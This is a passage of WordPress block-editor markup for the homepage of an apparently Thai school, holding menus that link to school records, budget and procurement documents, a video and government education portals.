{\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZCEZ5hxcJ5yfJGw3L1Kz5EAXscsQ0sTV/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZCEZ5hxcJ5yfJGw3L1Kz5EAXscsQ0sTV/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 